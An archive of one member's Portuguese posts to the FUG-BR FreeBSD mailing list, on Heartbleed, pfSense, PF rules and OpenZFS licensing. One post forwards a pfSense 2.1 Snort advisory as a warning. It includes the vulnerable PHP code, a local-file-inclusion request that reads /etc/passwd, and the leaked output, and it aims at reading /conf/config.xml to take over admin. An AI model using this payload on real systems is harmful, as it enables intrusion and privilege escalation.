Eksffa e Garga, obrigado por mais essa aula =)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] [FYI] Fwd: De Raadt + FBSD + OpenSSH + hole?

[Welkson Renny de Medeiros]

Pessoal,

Desculpe-me pela pergunta newbie, mas o OpenSSH que o FreeBSD usa não é o
MESMO do OpenBSD? Ou o FreeBSD fez algum tipo de "fork"?

". as long as you aren't using FreeBSD or a derivative (hint: Jupiper),
you are fine.  That's the only place I know of an OpenSSH hole. "

flames > /dev/null (saudoso Irado =)

Welkson



-- Forwarded message --
From: Todor Todorov 
Date: 2014-04-13 19:38 GMT-03:00
Subject: De Raadt + FBSD + OpenSSH + hole?
To: freebsd-secur...@freebsd.org


Hi everyone,
I came across this :

https://groups.google.com/forum/#!topic/mailing.openbsd.tech/xALfxxR3oKo

" You are welcome.  Stuart Henderson wrote the draft, but he forgot that
part, and Damien Miller and I realized it was needed.  We sensed there
might be some ambiguity...  we'll take care the next time an
OpenOffice problem also.

... as long as you aren't using FreeBSD or a derivative (hint: Jupiper),
you are fine.  That's the only place I know of an OpenSSH hole.

Oh now I sense some angst.  Please ask Kirk McKusick, he knows the
story about why this is not being disclosed to FreeBSD.  Sometimes I
feel a bit sorry for them (and for him), but then the next minute I
don't feel sorry because there's damn good reasons they won't be
told about what I found.

Does that answer help?  Hope so."

Any guidance here?
___
freebsd-secur...@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-Topic] So long and thanks for all the fish

[Welkson Renny de Medeiros]

Em 14 de abril de 2014 11:48, Daniel Bristot de Oliveira <
danielbris...@gmail.com> escreveu:

> Opa!
>
> Hoje tirei um tempo para limpar meus e-mails e vi que a muito tempo
> não participo da FUG, então acho justo sair do grupo.
>
> É a vida, a um tempo atrás resolvi migrar de plataforma por motivos
> profissionais e hoje aqui estou, longe do mundo FreeBSD... estou
> trabalhando em uma bem conhecida empresa norte americana de "Linux
> Enterprise".
>
> Gostaria apenas de agradecer formalmente à FUG e todos os seus
> membros, principalmente os que aqui estavam entre os anos de 2005 à
> 2009, por todo o conhecimento, oportunidades e amigos que
> ganhei/tive/fiz por aqui.
>
> Até logo, e obrigado por todos os peixes!
> --
> Daniel Bristot de Oliveira
>


Valeu professor! Boa sorte nessa nova empreitada.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Fwd: [FreeBSD-Announce] HEADSUP! OpenSSL "Heartbleed" bug]

[Welkson Renny de Medeiros]

Em 10 de abril de 2014 13:36, Welkson Renny de Medeiros
escreveu:

> Em 10 de abril de 2014 12:57, Enrique Fynn escreveu:
>
> Atenção especial aos servidores rodando FreeBSD, foram os únicos que
>> um atacante conseguiu extrair a chave privada do ssl pelo bug. A fonte
>> não é das mais confiáveis (Twitter) [0], mas não vejo razão para que
>> não seja verdadeira.
>>
>> Já vi que em sistemas linux ninguém conseguiu de fato extrair a chave
>> [1], no freeBSD a chave deve ficar na memória que vaza com o bug mais
>> frequentemente =/
>>
>>
>> [0] https://twitter.com/1njected/status/453781230593769472
>> [1]
>> http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html
>>
>> Peace;
>> Fynn.
>>
>
>
>

Aproveitando o gancho, lembrei do pfSense que usa HTTPS no WebGUI...

No fórum internacional do pfSense a galera está dizendo que várias versões
do pfSense estão vulneráveis... eu testei alguns usando esse site [1], e o
resultado me mostra o contrário.

Acredito que o openssl do pfSense apesar de ser um build vulnerável, foi
compilado sem heartbleed. Alguém confirma?

[1] http://rehmann.co/projects/heartbeat/

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Fwd: [FreeBSD-Announce] HEADSUP! OpenSSL "Heartbleed" bug]

[Welkson Renny de Medeiros]

Em 10 de abril de 2014 12:57, Enrique Fynn  escreveu:

> Atenção especial aos servidores rodando FreeBSD, foram os únicos que
> um atacante conseguiu extrair a chave privada do ssl pelo bug. A fonte
> não é das mais confiáveis (Twitter) [0], mas não vejo razão para que
> não seja verdadeira.
>
> Já vi que em sistemas linux ninguém conseguiu de fato extrair a chave
> [1], no freeBSD a chave deve ficar na memória que vaza com o bug mais
> frequentemente =/
>
>
> [0] https://twitter.com/1njected/status/453781230593769472
> [1]
> http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html
>
> Peace;
> Fynn.
>


Fynn,

Pelo que li sobre esse teste feito pelo 1njected, assim que ele inicou o
serviço já fez o teste via ssltest.py, ou seja, não tinha muita coisa na
memória além da chave privada.

Eu acredito que se repetir o teste em qualquer outro SO com openssl
vulnerável "nas mesmas condições" ocorrerá o mesmo problema.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Tutorial instalação FreeBSD 10 - bem básico

[Welkson Renny de Medeiros]

Em 9 de abril de 2014 11:21, Eduardo Schoedler escreveu:

> Correção: resolveram o problema do PF com SMP no OpenBSD?
>  Resposta:
>
> "Will multiple processors help?
> PF will only use one processor, so multiple processors (or multiple cores)
> WILL NOT improve PF performance."
>
> Portanto, cuidado para que você for usá-lo.
>
> [1] http://www.openbsd.dk/faq/pf/perf.html
>
>
> --
> Eduardo Schoedler
>


Quase que cometo o pecado de perguntar sem antes procurar no Google rsrsrs:
http://lists.freebsd.org/pipermail/freebsd-pf/2012-June/006643.html

Aparentemente no FreeBSD já foi implementado, certo?

Pelo que vi, estará no current do FreeBSD10:
https://wiki.freebsd.org/WhatsNew/FreeBSD10

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Fwd: [FreeBSD-Announce] HEADSUP! OpenSSL "Heartbleed" bug]

[Welkson Renny de Medeiros]

Em 9 de abril de 2014 09:04, Welkson Renny de Medeiros
escreveu:

> 2014-04-08 18:24 GMT-03:00 Renato Botelho :
>
>  Forwarded Message 
>> From: FreeBSD Security Officer 
>> Reply-to: freebsd-secur...@freebsd.org
>> To: FreeBSD Security Advisories 
>> Subject: [FreeBSD-Announce] HEADSUP! OpenSSL "Heartbleed" bug
>> Date: Tue, 8 Apr 2014 20:42:29 GMT
>>
>> Hi,
>>
>> This is a heads-up for the OpenSSL "Heartbleed" bug.
>>
>> FreeBSD port security/openssl have been patched on 2014-04-07 21:46:40
>> UTC (head, r350548) and 2014-04-07 21:48:07 UTC (branches/2014Q2,
>> r350549).
>>
>> FreeBSD base system have been patched on 2014-04-08 18:27:32 UTC (head,
>> r264265), 2014-04-08 18:27:39 UTC (stable/10, r264266), 2014-04-08
>> 18:27:46 UTC (releng/10.0, r264267).  The update is available with
>> freebsd-update.  All other supported FreeBSD branches are not affected
>> by this issue.
>>
>
>
> Quando vi o anúncio dessa falha não dei a devida importância, mas ontem já
> deu para perceber o tamanho do estrago. Conseguiram capturar diversas
> senhas de usuários do Yahoo, etc.
>
> Estava conferindo a versão do OpenSSL no meu sistema:
>
> % openssl version -v
>
> OpenSSL 0.9.8x 10 May 2012
>
> De acordo com esse site [1] não está vulnerável (mas é bem antiga, talvez
> tenha outras falhas, não sei).
>
> Nesse site [2] tem explicações referente a falha, e nesse [3] e esse [4]
> explica o bug no código.
>
> Para testar se seu site está vulnerável temos esses: [5] [6] [7]
>
> Aparentemente o SSH não é vulnerável [8]
>
> [1] http://beta.slashdot.org/story/200451
>
> [2] http://heartbleed.com/
>
> [3]
> http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html?m=1
>
> [4]
> http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html
>
> [5] http://possible.lv/tools/hb/
>
> [6] http://filippo.io/Heartbleed/
>
> [7] http://rehmann.co/projects/heartbeat/
>
> [8]
>
> Welkson
>


Esqueci do [8] http://undeadly.org/cgi?action=article&sid=20140408063423

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Fwd: [FreeBSD-Announce] HEADSUP! OpenSSL "Heartbleed" bug]

[Welkson Renny de Medeiros]

2014-04-08 18:24 GMT-03:00 Renato Botelho :

>  Forwarded Message 
> From: FreeBSD Security Officer 
> Reply-to: freebsd-secur...@freebsd.org
> To: FreeBSD Security Advisories 
> Subject: [FreeBSD-Announce] HEADSUP! OpenSSL "Heartbleed" bug
> Date: Tue, 8 Apr 2014 20:42:29 GMT
>
> Hi,
>
> This is a heads-up for the OpenSSL "Heartbleed" bug.
>
> FreeBSD port security/openssl have been patched on 2014-04-07 21:46:40
> UTC (head, r350548) and 2014-04-07 21:48:07 UTC (branches/2014Q2, r350549).
>
> FreeBSD base system have been patched on 2014-04-08 18:27:32 UTC (head,
> r264265), 2014-04-08 18:27:39 UTC (stable/10, r264266), 2014-04-08
> 18:27:46 UTC (releng/10.0, r264267).  The update is available with
> freebsd-update.  All other supported FreeBSD branches are not affected
> by this issue.
>


Quando vi o anúncio dessa falha não dei a devida importância, mas ontem já
deu para perceber o tamanho do estrago. Conseguiram capturar diversas
senhas de usuários do Yahoo, etc.

Estava conferindo a versão do OpenSSL no meu sistema:

% openssl version -v

OpenSSL 0.9.8x 10 May 2012

De acordo com esse site [1] não está vulnerável (mas é bem antiga, talvez
tenha outras falhas, não sei).

Nesse site [2] tem explicações referente a falha, e nesse [3] e esse [4]
explica o bug no código.

Para testar se seu site está vulnerável temos esses: [5] [6] [7]

Aparentemente o SSH não é vulnerável [8]

[1] http://beta.slashdot.org/story/200451

[2] http://heartbleed.com/

[3]
http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html?m=1

[4]
http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html

[5] http://possible.lv/tools/hb/

[6] http://filippo.io/Heartbleed/

[7] http://rehmann.co/projects/heartbeat/

[8]

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] OFF dúvida phpPgAdmin (recovery password)

[Welkson Renny de Medeiros]

2014-02-18 14:00 GMT-03:00 Denis Granato :

> Boa tarde a todos,
>
> Esqueci a senha do phpPgAdmin para gerenciar meu banco postgresql.
> Como posso recuperar?
>
> Obrigado
>


A senha na verdade não fica no PGAdmin, e sim no próprio Postgres. Se tiver
acesso ao servidor do banco basta modificar o pg_hba.conf colocando a
conexão em modo "trust", e em seguida "resetar" a senha usando psql como
mostrado abaixo:
http://scratching.psybermonkey.net/2009/06/postgresql-how-to-reset-user-name.html

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Phpvirtualbox

[Welkson Renny de Medeiros]

Em 13 de fevereiro de 2014 09:04, Cleber Medina
escreveu:

> Em 13/02/2014 09:33, Otavio Augusto escreveu:
> > Qual mensagem de erro nos logs do apache ?
> >
> > Em 11 de fevereiro de 2014 22:12, Cleber Medina
> >  escreveu:
> >> Hoje instalei o phpvirtualbox via ports no 10...
> >> Fiz os ajustes de usuário apache etc...mas não exibe a interface web
> >>
> >> Alguem tem alguma dica
> >> Tb não achei o  binario VboxManager nessa versão..
> >>
> >> Obrigado
>

Bem estranho, geralmente quando ocorre esses problemas de "página em
branco" é registrado uma mensagem de erro em:
tail -f /var/log/httpd-error.log

Tenta colocar um E_ALL no error_reporting (veja também "display_errors" e
"display_startup_errors" no seu php.ini  (/usr/local/etc/php.ini).

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] [FYI] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)

[Welkson Renny de Medeiros]

Senhores, boa tarde!

Alerta pra quem usa o package Snort no pfSense.

Welkson

...

##
#  _ ___  _   _    _  _
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| | / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_\___/|_| \_|\|\/_/   \_\_|
#
# Exploit Title: pfSense 2.1 Privilege Escalation from less privileged
users (LFI/RCE)
# Date: 25/01/2014 (0-day)
# Exploit Author: @u0x (Pichaya Morimoto)
# Software Link: www.pfsense.org
# Category: Local File Inclusion (LFI) & Privilege Escalation
# Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
#
#



pfSense firewall/router distribution description :

==

pfSense is a free, open source customized distribution of FreeBSD tailored
for use as a firewall and router. In addition to being a powerful, flexible
firewalling and routing platform, it includes a long list of related
features and a package system allowing further expandability without adding
bloat and potential security vulnerabilities to the base distribution.
pfSense is a popular project with more than 1 million downloads since its
inception, and proven in countless installations ranging from small home
networks protecting a PC and an Xbox to large corporations, universities
and other organizations protecting thousands of network devices.

This project started in 2004 as a fork of the m0n0wall project, but focused
towards full PC installations rather than the embedded hardware focus of
m0n0wall. pfSense also offers an embedded image for Compact Flash based
installations, however it is not our primary focus.

Attack Scenario

==

Authenticated users with only permission to access some packages in web gui
(a.k.a. webConfigurator) will be able to escalate themselves to other
privileged admin by reading /conf/config.xml file through bugs (i.e. Snort
LFI), result in fully compromise the pfSense.

This attack abuse the user privilege scheme with some of official packages
(System > Package Manager)

* Session Hijacking also possible to steal less privileged user sessions to
perform this trick  due to "http" admin by default webConfigurator.

Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion
Vulnerability

Vulnerable file:

==

snort_log_view.php

[+] Checksum
SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
MD5: cd767e46a4e9e09ede7fd26560e37f14

Vulnerable Source Code :
==
http://www.pfsense.com/packages/config/snort/snort_log_view.php
https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php

...(deducted)...

$contents = '';
// Read the contents of the argument passed to us.
// Is it a fully qualified path and file?

if (file_exists($_GET['logfile']))
   $contents = file_get_contents($_GET['logfile']);
// It is not something we can display, so print an error.
else
   $contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not
found!");
$pgtitle = array(gettext("Snort"), gettext("Log File Viewer"));
?>

...(deducted)...

...(deducted)...



Proof of Concept 1 : Arbitrary File Inclusion
==

GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
Host: firewall1.pentestlab1:1337
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: th,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083

HTTP/1.1 200 OK
Expires: Mon, 27 Jan 2014 07:25:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=18
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-type: text/html
Transfer-Encoding: chunked
Date: Sat, 25 Jan 2014 05:25:10 GMT
Server: lighttpd/1.4.32

...(deducted)...

   
   root:*:0:0:Charlie &:/root:/bin/sh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
...(deducted)...
havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin
squid:*:100:100:squid caching-proxy pseudo user:/var/squid:/usr/sbin/nologin
c_icap:*:959:959:c-icap daemon:/var/empty:/usr/sbin/nologin
snortadmin:*:2000:65534:Bill Gates:/home/snortadmin:/sbin/nologin
...(deducted)...

Proof of Concept 2 : Directory Traversal
# This trick works on PHP 5.3.27 with Suhosin-Patch (cgi-fcgi) +
Lighttpd/1.4.32 on FreeBSD 8.3 x64

Re: [FUG-BR] Bloqueio 443 apenas alguns sites.

[Welkson Renny de Medeiros]

Em 20 de janeiro de 2014 14:14, Anker Projeto escreveu:

> Boa tarde pessoal, hoje tenho rodando squid e estou tendo problemas com o
> HTTPS, quero bloquear alguns sites com https exceto alguns. uso o pf e
> estou tentando algo desse jeito , alguém pode me ajudar ?
>
> block in log on $IF_LAN proto {tcp, udp} from $REDE_LAN to port 443
> !
>
>
> dentro da tabela bancos eu coloqueis os ips dos bancos .
> Obrigado
>


Anker, bom dia!

Não tenho como testar agora, mas acredito que seria algo assim:
block in log on $IF_LAN proto tcp from $REDE_LAN to ! port 443

 Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd: [FreeBSD-Announce] FreeBSD 10.0-RELEASE Now Available

[Welkson Renny de Medeiros]

2014/1/20 Luiz Gustavo S. Costa 

> Uia ... que noticia boa !
>
>
> -- Forwarded message --
> From: Glen Barber 
> Date: 2014/1/20
>


Instalar em uma VM pra aprender a usar esse tal "pkg" =)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] ip de um dominio

[Welkson Renny de Medeiros]

Em 20 de janeiro de 2014 13:17, Renato Botelho  escreveu:

> On 20-01-2014 13:33, Cleber Medina wrote:
> > Boa tarde,
> >
> > Qual é a url daquele site que mostra todos os ips referentes a um
> dominio?
>
> Eu não sei qual a URL que você tá falando, mas vou te falar o que eu
> faço quando quero descobrir o range de IPs de um determinado site.
>


Ele deve está se referindo a esse:
http://bgp.he.net/

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] PPTP + PFSence

[Welkson Renny de Medeiros]

Em 17 de janeiro de 2014 10:27, Lucas Martinez escreveu:

> Questão é se conectar diretamente no notebook , Conecta.
>
> No pfsence está tudo liberado de dentro para fora, apenas
> o pptp não funciona.
>


A questão é que seu provedor do 3G pode ter roteado certinho o GRE 47, já o
link ligado ao pfSense não.

Enfim, precisaria de mais informações, screenshots das regras do firewall,
detalhes da configuração de rede (qual tipo de WAN é utilizada no pfSense,
se o link é ligado diretamente ao pfSense ou se passa por um roteador
antes, etc.).

Mais alguns links:
https://doc.pfsense.org/index.php/PPTP_VPN
https://doc.pfsense.org/index.php/GRE_Interfaces
https://doc.pfsense.org/index.php/PPTP_VPN

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] PPTP + PFSence

[Welkson Renny de Medeiros]

Em 17 de janeiro de 2014 13:39, Welkson Renny de Medeiros  escreveu:

> A questão é que seu provedor do 3G pode ter roteado certinho o GRE 47, já
> o link ligado ao pfSense não.
>
> Enfim, precisaria de mais informações, screenshots das regras do firewall,
> detalhes da configuração de rede (qual tipo de WAN é utilizada no pfSense,
> se o link é ligado diretamente ao pfSense ou se passa por um roteador
> antes, etc.).
>
> Mais alguns links:
> https://doc.pfsense.org/index.php/PPTP_VPN
> https://doc.pfsense.org/index.php/GRE_Interfaces
> https://doc.pfsense.org/index.php/PPTP_VPN
>
> Welkson
>

Último link foi igual, o correto seria esse:
http://devwiki.pfsense.org/PPTPTroubleShooting

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] PPTP + PFSence

[Welkson Renny de Medeiros]

Em 17 de janeiro de 2014 10:16, Lucas Martinez escreveu:

> Leo, obrigado !
>
> Segui seu material deixei tudo Any e á mesma coisa.
>
> Enable PPTP server , configurei as regras no pfsence
>
> Tambem acompanhei esse material:
>
> http://www.vivaolinux.com.br/artigo/Criando-VPN-com-o-PFSense?pagina=1verifiquei
> em mais 2 materiais ( tudo padrão )
>


O problema do PPTP é o GRE (protocolo 47), alguns provedores bloqueiam...
alguns roteadores não conseguem repassar o pacote, etc. Viu algo referente
a isso?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] FreeBSD 10.0 RC3 disponível para download

[Welkson Renny de Medeiros]

Em 27 de dezembro de 2013 10:11, Marcelo Gondim escreveu:

> Existe uma lenda urbana que diz que as versões pares são sempre as
> melhores hehehehe
> Até agora eu não tenho o que reclamar.
>
> []'s
> Gondim
>
>

Ouvi falar dessa lenda na época do Delphi... as versões ímpares sempre eram
boas... as pares, só dor de cabeça =)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] É verdade que ninguém tentou desenvolver um sistema operacional livre na década de 1980, exceto o Projeto GNU e (mais tarde) Berkeley CSRG, que havia sido solicitado especificamente pelo

[Welkson Renny de Medeiros]

Em 9 de dezembro de 2013 15:11, João Mancy  escreveu:

> Tártaro dois é a divisão binária de Tártaro Um , que veio do Jorge ???
>
> Interessante seu ciclo reprodutor, uma espécie de downgrade das Amebas.
>
>

Jorge ataca novamente =)

Não alimente trolls galera.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] [FYI] FreeBSD no Google Cloud Plataform (GCE)

[Welkson Renny de Medeiros]

Ótima notícia:
http://googlecloudplatform.blogspot.com.br/2013/12/google-compute-engine-is-now-generally-available.html

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC] FreeBSD on amazon aws - existe a opção ?

[Welkson Renny de Medeiros]

Em 18 de novembro de 2013 09:46, Leonardo Augusto escreveu:

> Pessoal,
>
> Alguém já conseguiu ou sabe se é possível utilizar freebsd nos
> serviços da amazon ?
> Vi um site com um monte de imagens de freebsd, mas no painel da conta
> de um amigo no aws,
> só tem opções de linux.
>
> []'s
>


Bom dia.

Colin Percival mantém essas imagens do BSD. Pelo que sei funcionam
perfeitamente (o tarsnap usa BSD na Amazon), mas não são suportadas
oficialmente pela Amazon.

https://aws.amazon.com/marketplace/pp/B00AA25MLK/
http://www.daemonology.net/freebsd-on-ec2/

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Certificado SSL no SQUID

[Welkson Renny de Medeiros]

Em 30 de outubro de 2013 09:30, Marcus Vinicius. escreveu:

> Isso mesmo, Neerlan.
>
> Em 30 de outubro de 2013 10:24, Neerlan Amorim 
> escreveu:
> > http://wiki.squid-cache.org/Features/SslBump
> >
> > Squid-in-the-middle decryption and encryption of straight CONNECT and
> > transparently redirected SSL traffic, using configurable CA
> > certificates. While decrypted, the traffic can be analyzed, blocked,
> > or adapted using regular Squid features such as ICAP and eCAP.
> >
> > É o que eu estou pensando?
> > Possibilidade de fazer cache desse conteúdo?
>


No meu caso nem me preocupo tanto com o cache, e sim com a possibilidade de
bloquear tráfego https usando proxy transparente.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd: [FreeBSD-Announce] Announcing OpenZFS

[Welkson Renny de Medeiros]

Em 18 de setembro de 2013 09:19, Antônio Pessoa escreveu:

> Pelo que me lembre, ela é baseada na Mozilla Public License 1.1 e
>  considerada incompatível com a GPL. Mas isso não chega a ser um
> problema, talvez apenas para o Linux.
>
> --
> Atenciosamente,
>
> Antônio Pessoa
>
>

Lendo mais um pouco encontrei esse link:
http://www.dirmgr.com/blog/2007/12/2/why-the-dislike-for-cddl.html

O primeiro comentário do link informa o seguinte:
"This is not directed at you, more at the framers of the CDDL (and by
extension, the MPL). The CDDL/MPL are incompatible because the CDDL/MPL
require you to distribute the source *only* under the CDDL/MPL. This isn't
a problem when mixing code with other file-based licenses like BSD-alikes,
but means it doesn't play nice with entire-work licenses like the GPL
(either version). I'd like to see Sun update the CDDL to allow CDDL code to
be distributed under the terms of GPLv3, just like GPLv3 allows code under
it to be distributed as part of a larger work under the Affero GPL. *goes
and writes an email to webmink* "

Essa parte parece interessante:
"This isn't a problem when mixing code with other file-based licenses like
BSD-alikes, but means it doesn't play nice with entire-work licenses like
the GPL (either version)."

O texto completo da CDDL está aqui:
http://opensource.org/licenses/CDDL-1.0

Tem algumas coisas referente a patentes e propriedade intelectual, mas como
não manjo nada disso passo a bola para os expert`s de plantão.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd: [FreeBSD-Announce] Announcing OpenZFS

[Welkson Renny de Medeiros]

Em 18 de setembro de 2013 08:55, Renato Botelho escreveu:

> Eu não manjo muito de licenças, mas o que tem de errado com a licença CDDL?
>
> Eu acredito que deva ser um fork da última versão open source do ZFS da
> Sun/Oracle, então não tem como mudar a licença.
>
> --
> Renato Botelho
>


Eu também não...

Mas lembro que na época que portaram ZFS para BSD houve bastante discussão
quanto a isso.

Acredito que seja o mesmo problema que ocorre no Linux (incompatibilidade
de licenças):
http://arstechnica.com/information-technology/2010/06/uptake-of-native-linux-zfs-port-hampered-by-license-conflict/

Mas enfim, que venha pra somar.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd: [FreeBSD-Announce] Announcing OpenZFS

[Welkson Renny de Medeiros]

Em 18 de setembro de 2013 08:30, Renato Botelho escreveu:

> De acordo com o site [1]:
>
> ZFS source code is copyright various contributors, and available under
> the CDDL open-source license.
>
> [1] http://www.open-zfs.org/wiki/About_OpenZFS
>
> []s
> --
> Renato Botelho
>
>

Garga,

Eu até vi esse link, mas como falava sobre ZFS e não sobre Open-ZFS pensei
que se tratava da versão da Oracle.

A licença continuando como CDDL não nos deixará da mesma forma na mão da
Oracle?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd: [FreeBSD-Announce] Announcing OpenZFS

[Welkson Renny de Medeiros]

2013/9/17 Marcelo Gondim 

> Em 17/09/13 21:33, Marcos Vinicios Silva dos Santos escreveu:
> > Pergunta de Newbie: Será que haverá muita diferença do ZFS da Oracle
> para o
> > OpenZFS? Será que vai ser possivel implementar todas as evoluções do ZFS
> da
> > Oracle?
>


Ainda estou lendo o site, mas confesso que não encontrei nada sobre o
licenciamento.

Esse projeto seria um "fork" do ZFS ou reescrito do zero?

Se for um fork, a licença continuará CDDL ou será BSD?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] Lançamento do pfSense 2.1-RELEASE

[Welkson Renny de Medeiros]

Boas novas:
http://blog.pfsense.org/?p=712

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Hangout assunto FreeBSD

[Welkson Renny de Medeiros]

Em 29 de agosto de 2013 12:11, Luiz Gustavo S. Costa <
luizgust...@luizgustavo.pro.br> escreveu:

> Olá pessoal,
>
> Eu estou querendo montar um Hangout semelhante ao modelo que eu utilizo
> para o Pfsense abordando algum assunto para FreeBSD.
>
> Ele terá um formato de tutorial, mas preciso conhecer a demanda.
>
> Inicialmente penso nos seguintes assuntos:
>
> - ZFS
> - Jail
> - Packet Filter / IPFW
> - build world && build kernel
> - 10-CURRENT
>
> O que acham ? se puderem opinar e/ou indicar outro assunto (claro, eu teria
> que avaliar o meu conhecimento em relação ao assunto proposto).
>
> No aguardo dos amigos.
>
> Abraços
>
> --
> Luiz Gustavo Costa (Powered by BSD)
>



ZFS avançado seria uma boa.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Sobre um site de críticas ao BSD

[Welkson Renny de Medeiros]

Em 22 de agosto de 2013 09:34, Sergio Augusto Vladisauskis <
sergi...@gmail.com> escreveu:

> "Linux is more portable then NetBSD" aham...
>
> --
> Sergio Augusto Vladisauskis
>


"PC-BSD is spyware", que tosco... só porque os caras usam bsdstats...
tempos atrás fizemos até uma campanha por aqui para que todos instalassem
para que o BR se destacasse no ranking mundial de uso do BSD.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Sobre um site de críticas ao BSD

[Welkson Renny de Medeiros]

Em 22 de agosto de 2013 02:21, Marcelo Gondim escreveu:

> Nossa aquele Jorge Luis não pode ver esse blog não, senão a gente tá
> lascado HaHaHAhAhAhAh
>
>
>
Se o autor desse tópico não for Jorge Luis usando outro nome k
https://www.google.com.br/search?q=Johann+Peter+Dirichlet

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [off-topic] Palestra sobre como é a estrutura do Facebook para suportar 1 bilhão de usuários

